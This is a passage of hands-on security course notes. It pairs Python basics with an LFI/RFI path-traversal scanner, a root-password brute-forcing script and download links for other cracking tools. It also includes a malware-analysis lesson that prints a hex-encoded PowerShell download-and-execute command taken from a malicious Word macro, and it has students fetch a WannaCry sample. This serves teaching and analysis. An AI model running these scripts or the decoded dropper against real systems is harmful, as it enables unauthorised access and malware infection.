  2337. result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  2338. print result
  2339. ----------------------------------------------------------------------
  2340.  
  2341. Output:
  2342. ['2007', '2016', '2009']
  2343.  
  2344.  
  2345.  
  2346.  
  2347.  
  2348. *******************************************************************
  2349. * Problem 5: Return all words of a string those starts with vowel *
  2350. *******************************************************************
  2351.  
  2352.  
  2353.  
  2354.  
  2355. Solution-1 Return each words
  2356. -----------------------------------------------------------------------------------------------------------------
  2357.  
  2358. Code
  2359. ---------------------------Type This-----------------------------------
  2360.  
  2361. result=re.findall(r'\w+','Python is the best')
  2362. print result
  2363. ----------------------------------------------------------------------
  2364.  
  2365. Output:
  2366. ['Python', 'is', 'the', 'best']
  2367.  
  2368.  
  2369.  
  2370.  
  2371.  
  2372. Solution-2 Return words starts with alphabets (using [])
  2373. ------------------------------------------------------------------------------------------------------------------
  2374.  
  2375. Code
  2376. ---------------------------Type This-----------------------------------
  2377.  
  2378. result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
  2379. print result
  2380. ----------------------------------------------------------------------
  2381.  
  2382. Output:
  2383. ['ove', 'on']
  2384.  
  2385. Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.
  2386.  
  2387.  
  2388.  
  2389.  
  2390.  
  2391. Solution- 3
  2392. ------------------------------------------------------------------------------------------------------------------
  2393.  
  2394. Code
  2395. ---------------------------Type This-----------------------------------
  2396.  
  2397. result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
  2398. print result
  2399. ----------------------------------------------------------------------
  2400.  
  2401. Output:
  2402. []
  2403.  
  2404. In similar ways, we can extract words those starts with constant using "^" within square bracket.
  2405.  
  2406.  
  2407. Code
  2408. ---------------------------Type This-----------------------------------
  2409.  
  2410. result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
  2411. print result
  2412. ----------------------------------------------------------------------
  2413.  
  2414. Output:
  2415. [' love', ' Python']
  2416.  
  2417. Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].
  2418.  
  2419.  
  2420. Code
  2421. ---------------------------Type This-----------------------------------
  2422.  
  2423. result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
  2424. print result
  2425. ----------------------------------------------------------------------
  2426.  
  2427. Output:
  2428. ['love', 'Python']
  2429.  
  2430.  
  2431.  
  2432.  
  2433.  
  2434.  
  2435. *************************************************************************************************
  2436. * Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
  2437. *************************************************************************************************
  2438.  
  2439.  
  2440. We have a list phone numbers in list "li" and here we will validate phone numbers using regular
  2441.  
  2442.  
  2443.  
  2444.  
  2445. Solution
  2446. -------------------------------------------------------------------------------------------------------------------------------------
  2447.  
  2448.  
  2449. Code
  2450. ---------------------------Type This-----------------------------------
  2451.  
  2452. import re
  2453. li=['9999999999','999999-999','99999x9999']
  2454. for val in li:
  2455. if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
  2456. print 'yes'
  2457. else:
  2458. print 'no'
  2459.  
  2460. ----------------------------------------------------------------------
  2461.  
  2462. Output:
  2463. yes
  2464. no
  2465. no
  2466.  
  2467.  
  2468.  
  2469.  
  2470.  
  2471. ******************************************************
  2472. * Problem 7: Split a string with multiple delimiters *
  2473. ******************************************************
  2474.  
  2475.  
  2476.  
  2477. Solution
  2478. ---------------------------------------------------------------------------------------------------------------------------
  2479.  
  2480.  
  2481. Code
  2482. ---------------------------Type This-----------------------------------
  2483.  
  2484. import re
  2485. line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
  2486. result= re.split(r'[;,\s]', line)
  2487. print result
  2488. ----------------------------------------------------------------------
  2489.  
  2490. Output:
  2491. ['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']
  2492.  
  2493.  
  2494.  
  2495. We can also use method re.sub() to replace these multiple delimiters with one as space " ".
  2496.  
  2497.  
  2498. Code
  2499. ---------------------------Type This-----------------------------------
  2500.  
  2501. import re
  2502. line = 'asdf fjdk;afed,fjek,asdf,foo'
  2503. result= re.sub(r'[;,\s]',' ', line)
  2504. print result
  2505. ----------------------------------------------------------------------
  2506.  
  2507. Output:
  2508. asdf fjdk afed fjek asdf foo
  2509.  
  2510.  
  2511.  
  2512.  
  2513. **************************************************
  2514. * Problem 8: Retrieve Information from HTML file *
  2515. **************************************************
  2516.  
  2517.  
  2518.  
  2519. I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.
  2520.  
  2521.  
  2522.  
  2523. Sample HTML file (str)
  2524. ---------------------------Paste This-----------------------------------
  2525.  
  2526. <tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
  2527. <tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
  2528. <tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
  2529. <tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
  2530. <tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
  2531. <tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
  2532. <tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
  2533. ----------------------------------------------------------------------
  2534.  
  2535. Solution:
  2536.  
  2537.  
  2538.  
  2539. Code
  2540. ---------------------------Type This-----------------------------------
  2541.  
  2542. result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
  2543. print result
  2544. ----------------------------------------------------------------------
  2545.  
  2546. Output:
  2547. [('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
  2548.  
  2549.  
  2550.  
  2551. You can read html file using library urllib2 (see below code).
  2552.  
  2553.  
  2554. Code
  2555. ---------------------------Type This-----------------------------------
  2556.  
  2557. import urllib2
  2558. response = urllib2.urlopen('')
  2559. html = response.read()
  2560. ----------------------------------------------------------------------
  2561.  
  2562.  
  2563.  
  2564.  
  2565.  
  2566.  
  2567. #################################################
  2568. # Lesson 27: Python Functions & String Handling #
  2569. #################################################
  2570.  
  2571. Python can make use of functions:
  2572. http://www.tutorialspoint.com/python/python_functions.htm
  2573.  
  2574.  
  2575.  
  2576. Python can interact with the 'crypt' function used to create Unix passwords:
  2577. http://docs.python.org/2/library/crypt.html
  2578.  
  2579.  
  2580.  
  2581. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
  2582. http://www.tutorialspoint.com/python/string_split.htm
  2583.  
  2584.  
  2585. Tonight we will see a lot of slicing so be sure to keep the following references close by:
  2586. http://techearth.net/python/index.php5?title=Python:Basics:Slices
  2587.  
  2588.  
  2589. ---------------------------Type This-----------------------------------
  2590. vi LFI-RFI.py
  2591.  
  2592.  
  2593. ---------------------------Paste This-----------------------------------
  2594.  
  2595.  
  2596. #!/usr/bin/env python
  2597. print "\n### PHP LFI/RFI Detector ###"
  2598.  
  2599. import urllib2,re,sys
  2600.  
  2601. TARGET = "http://10.1.1.38/showfile.php?filename=about.txt"
  2602. RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
  2603. TravLimit = 12
  2604.  
  2605. print "==> Testing for LFI vulns.."
  2606. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
  2607. for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
  2608. TARGET += "../"
  2609. try:
  2610. source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
  2611. except urllib2.URLError, e:
  2612. print "$$$ We had an Error:",e
  2613. sys.exit(0)
  2614. if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  2615. print "!! ==> LFI Found:",TARGET+"etc/passwd"
  2616. break ## BREAK LOOP WHEN VULN FOUND
  2617.  
  2618. print "\n==> Testing for RFI vulns.."
  2619. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
  2620. try:
  2621. source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
  2622. except urllib2.URLError, e:
  2623. print "$$$ We had an Error:",e
  2624. sys.exit(0)
  2625. if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
  2626. print "!! => RFI Found:",TARGET
  2627.  
  2628. print "\nScan Complete\n" ## DONE
  2629.  
  2630.  
  2631.  
  2632. -----------------------------------------------------------------------
  2633.  
  2634.  
  2635. ################################
  2636. # Lesson 28: Password Cracking #
  2637. ################################
  2638.  
  2639. ---------------------------Type This-----------------------------------
  2640.  
  2641. wget https://s3.amazonaws.com/infosecaddictsfiles/htcrack.py
  2642.  
  2643. vi htcrack.py
  2644.  
  2645. vi list.txt
  2646.  
  2647. ---------------------------Paste This-----------------------------------
  2648.  
  2649. hello
  2650. goodbye
  2651. red
  2652. blue
  2653. yourname
  2654. tim
  2655. bob
  2656.  
  2657. -----------------------------------------------------------------------
  2658.  
  2659. ---------------------------Type This-----------------------------------
  2660.  
  2661. htpasswd -nd yourname
  2662. - enter yourname as the password
  2663.  
  2664.  
  2665.  
  2666. python htcrack.py joe:7XsJIbCFzqg/o list.txt
  2667.  
  2668.  
  2669.  
  2670.  
  2671. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
  2672.  
  2673. rm -rf mechanize-0.2.5.tar.gz
  2674.  
  2675. sudo /bin/bash
  2676.  
  2677. passwd
  2678. ***set root password***
  2679.  
  2680.  
  2681.  
  2682. ---------------------------Type This-----------------------------------
  2683.  
  2684. vi rootbrute.py
  2685.  
  2686. ---------------------------Paste This-----------------------------------
  2687.  
  2688. #!/usr/bin/env python
  2689.  
  2690. import sys
  2691. try:
  2692. import pexpect
  2693. except(ImportError):
  2694. print "\nYou need the pexpect module."
  2695. print "http://www.noah.org/wiki/Pexpect\n"
  2696. sys.exit(1)
  2697.  
  2698. #Change this if needed.
  2699. # LOGIN_ERROR = 'su: incorrect password'
  2700. LOGIN_ERROR = "su: Authentication failure"
  2701.  
  2702. def brute(word):
  2703. print "Trying:",word
  2704. child = pexpect.spawn('/bin/su')
  2705. child.expect('Password: ')
  2706. child.sendline(word)
  2707. i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
  2708. if i == 1:
  2709. print "Incorrect Password"
  2710.  
  2711. if i == 2:
  2712. print "\n\t[!] Root Password:" ,word
  2713. child.sendline ('id')
  2714. print child.before
  2715. child.interact()
  2716.  
  2717. if len(sys.argv) != 2:
  2718. print "\nUsage : ./rootbrute.py <wordlist>"
  2719. print "Eg: ./rootbrute.py words.txt\n"
  2720. sys.exit(1)
  2721.  
  2722. try:
  2723. words = open(sys.argv[1], "r").readlines()
  2724. except(IOError):
  2725. print "\nError: Check your wordlist path\n"
  2726. sys.exit(1)
  2727.  
  2728. print "\n[+] Loaded:",len(words),"words"
  2729. print "[+] BruteForcing...\n"
  2730. for word in words:
  2731. brute(word.replace("\n",""))
  2732.  
  2733.  
  2734. -----------------------------------------------------------------------
  2735.  
  2736.  
  2737. References you might find helpful:
  2738. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
  2739.  
  2740.  
  2741.  
  2742.  
  2743.  
  2744.  
  2745.  
  2746. ---------------------------Type This-----------------------------------
  2747.  
  2748.  
  2749. wget https://s3.amazonaws.com/infosecaddictsfiles/md5crack.py
  2750.  
  2751. vi md5crack.py
  2752.  
  2753.  
  2754. -----------------------------------------------------------------------
  2755.  
  2756.  
  2757.  
  2758.  
  2759. Why use hexdigest
  2760. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
  2761.  
  2762.  
  2763.  
  2764.  
  2765. http://md5online.net/
  2766.  
  2767.  
  2768.  
  2769.  
  2770.  
  2771. ---------------------------Type This-----------------------------------
  2772.  
  2773.  
  2774. wget https://s3.amazonaws.com/infosecaddictsfiles/wpbruteforcer.py
  2775.  
  2776.  
  2777. -----------------------------------------------------------------------
  2778.  
  2779.  
  2780.  
  2781. ########################
  2782. # Lesson 29: Functions #
  2783. ########################
  2784.  
  2785.  
  2786. ***********************
  2787. * What are Functions? *
  2788. ***********************
  2789.  
  2790.  
  2791. Functions are a convenient way to divide your code into useful blocks, allowing us to order our code, make it more readable, reuse it and save some time. Also functions are a key way to define interfaces so programmers can share their code.
  2792.  
  2793. How do you write functions in Python?
  2794.  
  2795. Python makes use of blocks.
  2796.  
  2797. A block is a area of code of written in the format of:
  2798.  
  2799. block_head:
  2800.  
  2801. 1st block line
  2802.  
  2803. 2nd block line
  2804.  
  2805. ...
  2806.  
  2807.  
  2808. Where a block line is more Python code (even another block), and the block head is of the following format: block_keyword block_name(argument1,argument2, ...) Block keywords you already know are "if", "for", and "while".
  2809.  
  2810. Functions in python are defined using the block keyword "def", followed with the function's name as the block's name. For example:
  2811.  
  2812. def my_function():
  2813. print("Hello From My Function!")
  2814.  
  2815.  
  2816. Functions may also receive arguments (variables passed from the caller to the function). For example:
  2817.  
  2818. def my_function_with_args(username, greeting):
  2819. print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
  2820.  
  2821.  
  2822. Functions may return a value to the caller, using the keyword- 'return' . For example:
  2823.  
  2824. def sum_two_numbers(a, b):
  2825. return a + b
  2826.  
  2827.  
  2828. ****************************************
  2829. * How do you call functions in Python? *
  2830. ****************************************
  2831.  
  2832. Simply write the function's name followed by (), placing any required arguments within the brackets. For example, lets call the functions written above (in the previous example):
  2833.  
  2834. # Define our 3 functions
  2835. ---------------------------Paste This-----------------------------------
  2836.  
  2837. def my_function():
  2838. print("Hello From My Function!")
  2839.  
  2840. def my_function_with_args(username, greeting):
  2841. print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
  2842.  
  2843. def sum_two_numbers(a, b):
  2844. return a + b
  2845.  
  2846. # print(a simple greeting)
  2847. my_function()
  2848.  
  2849. #prints - "Hello, Joe, From My Function!, I wish you a great year!"
  2850. my_function_with_args("Joe", "a great year!")
  2851.  
  2852. # after this line x will hold the value 3!
  2853. x = sum_two_numbers(1,2)
  2854. -----------------------------------------------------------------------
  2855.  
  2856.  
  2857. ************
  2858. * Exercise *
  2859. ************
  2860.  
  2861. In this exercise you'll use an existing function, and while adding your own to create a fully functional program.
  2862.  
  2863. Add a function named list_benefits() that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
  2864.  
  2865. Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
  2866.  
  2867. Run and see all the functions work together!
  2868.  
  2869.  
  2870. ---------------------------Paste This-----------------------------------
  2871.  
  2872. # Modify this function to return a list of strings as defined above
  2873. def list_benefits():
  2874. pass
  2875.  
  2876. # Modify this function to concatenate to each benefit - " is a benefit of functions!"
  2877. def build_sentence(benefit):
  2878. pass
  2879.  
  2880. def name_the_benefits_of_functions():
  2881. list_of_benefits = list_benefits()
  2882. for benefit in list_of_benefits:
  2883. print(build_sentence(benefit))
  2884.  
  2885. name_the_benefits_of_functions()
  2886.  
  2887.  
  2888. -----------------------------------------------------------------------
  2889.  
  2890.  
  2891.  
  2892.  
  2893. #####################################
  2894. # Lesson 30: Python Lambda Function #
  2895. #####################################
  2896.  
  2897.  
  2898. Python allows you to create anonymous function i.e function having no names using a facility called lambda function.
  2899.  
  2900. lambda functions are small functions usually not more than a line. It can have any number of arguments just like a normal function. The body of lambda functions is very small and consists of only one expression. The result of the expression is the value when the lambda is applied to an argument. Also there is no need for any return statement in lambda function.
  2901.  
  2902. Let’s take an example:
  2903.  
  2904. Consider a function multiply()
  2905.  
  2906. def multiply(x, y):
  2907. return x * y
  2908.  
  2909.  
  2910. This function is too small, so let’s convert it into a lambda function.
  2911.  
  2912. To create a lambda function first write keyword lambda followed by one of more arguments separated by comma, followed by colon sign ( : ), followed by a single line expression.
  2913.  
  2914. ---------------------------Type This-----------------------------------
  2915.  
  2916. >>> r = lambda x, y: x * y
  2917. >>> r(12,3)
  2918. 36
  2919. -----------------------------------------------------------------------
  2920.  
  2921. Here we are using two arguments x and y , expression after colon is the body of the lambda function. As you can see lambda function has no name and is called through the variable it is assigned to.
  2922.  
  2923. You don’t need to assign lambda function to a variable.
  2924.  
  2925. ---------------------------Type This-----------------------------------
  2926.  
  2927. >>> (lambda x, y: x * y)(3,4)
  2928. 12
  2929. -----------------------------------------------------------------------
  2930.  
  2931. Note that lambda function can’t contain more than one expression.
  2932.  
  2933.  
  2934.  
  2935. #############################
  2936. # Lesson 31: Python Classes #
  2937. #############################
  2938.  
  2939.  
  2940. ****************
  2941. * Introduction *
  2942. ****************
  2943.  
  2944. Classes are the cornerstone of Object Oriented Programming. They are the blueprints used to create objects. And, as the name suggests, all of Object Oriented Programming centers around the use of objects to build programs.
  2945.  
  2946. You don't write objects, not really. They are created, or instantiated, in a program using a class as their basis. So, you design objects by writing classes. That means that the most important part of understanding Object Oriented Programming is understanding what classes are and how they work.
  2947.  
  2948.  
  2949. ***********************
  2950. * Real World Examples *
  2951. ***********************
  2952.  
  2953.  
  2954. This next part if going to get abstract. You can think of objects in programming just like objects in the real world. Classes are then the way you would describe those objects and the plans for what they can do.
  2955.  
  2956. Start off by thinking about a web vuln scanner.
  2957.  
  2958. What about what they can do? Nearly every web vuln scanner can do the same basic things, but they just might do them differently or at different speeds. You could then describe the actions that a vuln scanner can perform using functions. In Object Oriented Programming, though, functions are called methods.
  2959.  
  2960. So, if you were looking to use "vuln scanner" objects in your program, you would create a "vuln scanner" class to serve as a blueprint with all of the variables that you would want to hold information about your "vuln scanner" objects and all of the methods to describe what you would like your vuln scanner to be able to do.
  2961.  
  2962.  
  2963. ******************
  2964. * A Python Class *
  2965. ******************
  2966.  
  2967.  
  2968. Now that you have a general idea of what a class is, it's best to take a look at a real Python class and study how it is structured.
  2969.  
  2970. ---------------------------Paste This-----------------------------------
  2971.  
  2972. class WebVulnScanner(object):
  2973. make = 'Acunetix'
  2974. model = '10.5'
  2975. year = '2014'
  2976. version ='Consultant Edition'
  2977.  
  2978. profile = 'High Risk'
  2979.  
  2980.  
  2981. def crawling(self, speed):
  2982. print("Crawling at %s" % speed)
  2983.  
  2984.  
  2985. def scanning(self, speed):
  2986. print("Scanning at %s" % speed)
  2987. -----------------------------------------------------------------------
  2988.  
  2989.  
  2990. Creating a class looks a lot like creating a function. Instead of def you use the keyword, class. Then, you give it a name, just like you would a function. It also has parenthesis like a function, but they don't work the way you think. For a class the parenthesis allow it to extend an existing class. Don't worry about this right now, just understand that you have to put object there because it's the base of all other classes.
  2991.  
  2992. From there, you can see a bunch of familiar things that you'd see floating around any Python program, variables and functions. There are a series of variables with information about the scanner and a couple of methods(functions) describing what the scanner can do. You can see that each of the methods takes two parameters, self and speed. You can see that "speed" is used in the methods to print out how fast the scanner is scanning, but "self" is different.
  2993.  
  2994.  
  2995. *****************
  2996. * What is Self? *
  2997. *****************
  2998.  
  2999. Alright, so "self" is the biggest quirk in the way that Python handles Object Oriented Programming. In most languages, classes and objects are just aware of their variables in their methods. Python needs to be told to remember them. When you pass "self" to a method, you are essentially passing that object to its method to remind it of all of the variables and other methods in that object. You also need to use it when using variables in methods. For example, if you wanted to output the model of the scanner along with the speed, it looks like this.
  3000.  
  3001. ---------------------------Type This-----------------------------------
  3002.  
  3003. print("Your %s is crawling at %s" % (self.model, speed))
  3004. -----------------------------------------------------------------------
  3005.  
  3006. It's awkward and odd, but it works, and it's really not worth worrying about. Just remember to include "self" as the first parameter of your methods and "self." in front of your variables, and you'll be alright.
  3007.  
  3008.  
  3009. *****************
  3010. * Using A Class *
  3011. *****************
  3012.  
  3013.  
  3014. You're ready to start using the WebVulnScanner class. Create a new Python file and paste the class in. Below, you can create an object using it. Creating, or instantiating, an object in Python looks like the line below.
  3015. ---------------------------Type This-----------------------------------
  3016.  
  3017. myscanner = WebVulnScanner()
  3018. -----------------------------------------------------------------------
  3019.  
  3020.  
  3021. That's it. To create a new object, you just have to make a new variable and set it equal to class that you are basing your object on.
  3022.  
  3023. Get your scanner object to print out its make and model.
  3024. ---------------------------Type This-----------------------------------
  3025.  
  3026. print("%s %s" % (myscanner.make, myscanner.model))
  3027. -----------------------------------------------------------------------
  3028.  
  3029. The use of a . between an object and its internal components is called the dot notation. It's very common in OOP. It works for methods the same way it does for variables.
  3030. ---------------------------Type This-----------------------------------
  3031.  
  3032. myscanner.scanning('10req/sec')
  3033. -----------------------------------------------------------------------
  3034.  
  3035. What if you want to change the profile of your scanning? You can definitely do that too, and it works just like changing the value of any other variable. Try printing out the profile of your scanner first. Then, change the profile, and print it out again.
  3036. ---------------------------Type This-----------------------------------
  3037.  
  3038. print("The profile of my scanner settings is %s" % myscanner.profile)
  3039. myscanner.profile = "default"
  3040. print("The profile of my scanner settings is %s" % myscanner.profile)
  3041. -----------------------------------------------------------------------
  3042.  
  3043. Your scanner settings are default now. What about a new WebVulnScanner? If you made a new scanner object, would the scanning profile be default? Give it a shot.
  3044. ---------------------------Type This-----------------------------------
  3045.  
  3046. mynewscanner = WebVulnScanner()
  3047. print("The scanning profile of my new scanner is %s" % mynewscanner.profile)
  3048. -----------------------------------------------------------------------
  3049.  
  3050. That one's high risk. New objects are copied from the class, and the class still says that the profile is high risk. Objects exist in the computer's memory while a program is running. When you change the values within an object, they are specific to that object as it exists in memory. The changes won't persist once the program stops and won't change the class that it was created from.
  3051.  
  3052.  
  3053. #########################################
  3054. # The self variable in python explained #
  3055. #########################################
  3056.  
  3057. So lets start by making a class involving the self variable.
  3058.  
  3059. A simple class :
  3060.  
  3061. So here is our class:
  3062. ---------------------------Paste This-----------------------------------
  3063.  
  3064. class port(object):
  3065. open = False
  3066. def open_port(self):
  3067. if not self.open:
  3068. print("port open")
  3069.  
  3070. -----------------------------------------------------------------------
  3071.  
  3072. First let me explain the above code without the technicalities. First of all we make a class port. Then we assign it a property “open” which is currently false. After that we assign it a function open_port which can only occur if “open” is False which means that the port is open.
  3073.  
  3074. Making a Port:
  3075.  
  3076. Now that we have made a class for a Port, lets actually make a port:
  3077. ---------------------------Type This-----------------------------------
  3078.  
  3079. x = port()
  3080. -----------------------------------------------------------------------
  3081.  
  3082. Now x is a port which has a property open and a function open_port. Now we can access the property open by typing:
  3083. ---------------------------Type This-----------------------------------
  3084.  
  3085. x.open
  3086. -----------------------------------------------------------------------
  3087.  
  3088. The above command is same as:
  3089. ---------------------------Type This-----------------------------------
  3090.  
  3091. port().open
  3092. -----------------------------------------------------------------------
  3093.  
  3094. Now you can see that self refers to the bound variable or object. In the first case it was x because we had assigned the port class to x whereas in the second case it referred to port(). Now if we have another port y, self will know to access the open value of y and not x. For example check this example:
  3095. ---------------------------Type This-----------------------------------
  3096.  
  3097. >>> x = port()
  3098. >>> x.open
  3099. False
  3100. >>> y = port()
  3101. >>> y.open = True
  3102. >>> y.open
  3103. True
  3104. >>> x.open
  3105. False
  3106.  
  3107. -----------------------------------------------------------------------
  3108. The first argument of every class method, including init, is always a reference to the current instance of the class. By convention, this argument is always named self. In the init method, self refers to the newly created object; in other class methods, it refers to the instance whose method was called. For example the below code is the same as the above code.
  3109.  
  3110. ---------------------------Paste This-----------------------------------
  3111.  
  3112. class port(object):
  3113. open = False
  3114. def open_port(this):
  3115. if not this.open:
  3116. print("port open")
  3117.  
  3118. -----------------------------------------------------------------------
  3119.  
  3120.  
  3121.  
  3122.  
  3123.  
  3124. ###############################
  3125. # Lesson 32: Malware Analysis #
  3126. ###############################
  3127.  
  3128.  
  3129.  
  3130.  
  3131. ################
  3132. # The Scenario #
  3133. ################
  3134. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  3135.  
  3136.  
  3137. The fastest thing you can do is perform static analysis.
  3138. ---------------------------Type This-----------------------------------
  3139.  
  3140. sudo pip install olefile
  3141. infosecaddicts
  3142.  
  3143. mkdir ~/Desktop/oledump
  3144.  
  3145. cd ~/Desktop/oledump
  3146.  
  3147. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  3148.  
  3149. unzip oledump_V0_0_22.zip
  3150.  
  3151. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  3152.  
  3153. unzip 064016.zip
  3154. infected
  3155.  
  3156. python oledump.py 064016.doc
  3157.  
  3158. python oledump.py 064016.doc -s A4 -v
  3159. -----------------------------------------------------------------------
  3160.  
  3161. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  3162. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  3163.  
  3164. ---------------------------Type This-----------------------------------
  3165.  
  3166. python oledump.py 064016.doc -s A5 -v
  3167. -----------------------------------------------------------------------
  3168.  
  3169. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  3170.  
  3171. ---------------------------Type This-----------------------------------
  3172.  
  3173. python oledump.py 064016.doc -s A3 -v
  3174. -----------------------------------------------------------------------
  3175.  
  3176. - Look for "GVhkjbjv" and you should see:
  3177.  
  3178. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  3179.  
  3180. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  3181. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  3182.  
  3183.  
  3184.  
  3185. ##############################
  3186. # Lesson 33: Static Analysis #
  3187. ##############################
  3188.  
  3189. - After logging please open a terminal window and type the following commands:
  3190. ---------------------------Type This-----------------------------------
  3191.  
  3192. cd Desktop/
  3193.  
  3194. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  3195.  
  3196. unzip wannacry.zip
  3197. infected
  3198.  
  3199. file wannacry.exe
  3200.  
  3201. mv wannacry.exe malware.pdf
  3202.  
  3203. file malware.pdf
  3204.  
  3205. mv malware.pdf wannacry.exe
  3206.  
  3207. hexdump -n 2 -C wannacry.exe
  3208.  
  3209. -----------------------------------------------------------------------
  3210.  
  3211.  
  3212.  
  3213. ***What is '4d 5a' or 'MZ'***
  3214. Reference:
  3215. http://www.garykessler.net/library/file_sigs.html
  3216.  
  3217.  
  3218.  
  3219. ---------------------------Type This-----------------------------------
  3220.  
  3221.  
  3222. objdump -x wannacry.exe
  3223.  
  3224. strings wannacry.exe
  3225.  
  3226. strings --all wannacry.exe | head -n 6
  3227.  
  3228. strings wannacry.exe | grep -i dll
  3229.  
  3230. strings wannacry.exe | grep -i library
  3231.  
  3232. strings wannacry.exe | grep -i reg
  3233.  
  3234. strings wannacry.exe | grep -i key
  3235.  
  3236. strings wannacry.exe | grep -i rsa
  3237.  
  3238. strings wannacry.exe | grep -i open
  3239.  
  3240. strings wannacry.exe | grep -i get
  3241.  
  3242. strings wannacry.exe | grep -i mutex
  3243.  
  3244. strings wannacry.exe | grep -i irc
  3245.  
  3246. strings wannacry.exe | grep -i join
  3247.  
  3248. strings wannacry.exe | grep -i admin
  3249.  
  3250. strings wannacry.exe | grep -i list
  3251.  
  3252.  
  3253.  
  3254. -----------------------------------------------------------------------
  3255.  
  3256.  
  3257.  
  3258.  
  3259.  
  3260.  
  3261.  
  3262.  
  3263. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  3264.  
  3265. Quick Google search for "wannacry ransomeware analysis"
  3266.  
  3267.  
  3268. Reference
  3269. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  3270.  
  3271. - Yara Rule -
  3272.  
  3273.  
  3274. Strings:
  3275. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  3276. $s2 = “Wanna Decryptor” wide ascii nocase
  3277. $s3 = “.wcry” wide ascii nocase
  3278. $s4 = “WANNACRY” wide ascii nocase
  3279. $s5 = “WANACRY!” wide ascii nocase
  3280. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  3281.  
  3282.  
  3283.  
  3284.  
  3285.  
  3286.  
  3287.  
  3288.  
  3289. Ok, let's look for the individual strings
  3290.  
  3291. ---------------------------Type This-----------------------------------
  3292.  
  3293.  
  3294. strings wannacry.exe | grep -i ooops
  3295.  
  3296. strings wannacry.exe | grep -i wanna
  3297.  
  3298. strings wannacry.exe | grep -i wcry
  3299.  
  3300. strings wannacry.exe | grep -i wannacry
  3301.  
  3302. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  3303.  
  3304.  
  3305. -----------------------------------------------------------------------
  3306.  
  3307.  
  3308.  
  3309.  
  3310.  
  3311. ###############################################
  3312. # Lesson 34: Tired of GREP - let's try Python #
  3313. ###############################################
  3314. Decided to make my own script for this kind of stuff in the future. I
  3315.  
  3316. Reference1:
  3317. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  3318.  
  3319. This is a really good script for the basics of static analysis
  3320.  
  3321. Reference:
  3322. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  3323.  
  3324.  
  3325. This is really good for showing some good signatures to add to the Python script
  3326.  
  3327.  
  3328. Here is my own script using the signatures (started this yesterday, but still needs work):
  3329. https://pastebin.com/guxzCBmP
  3330.  
  3331.  
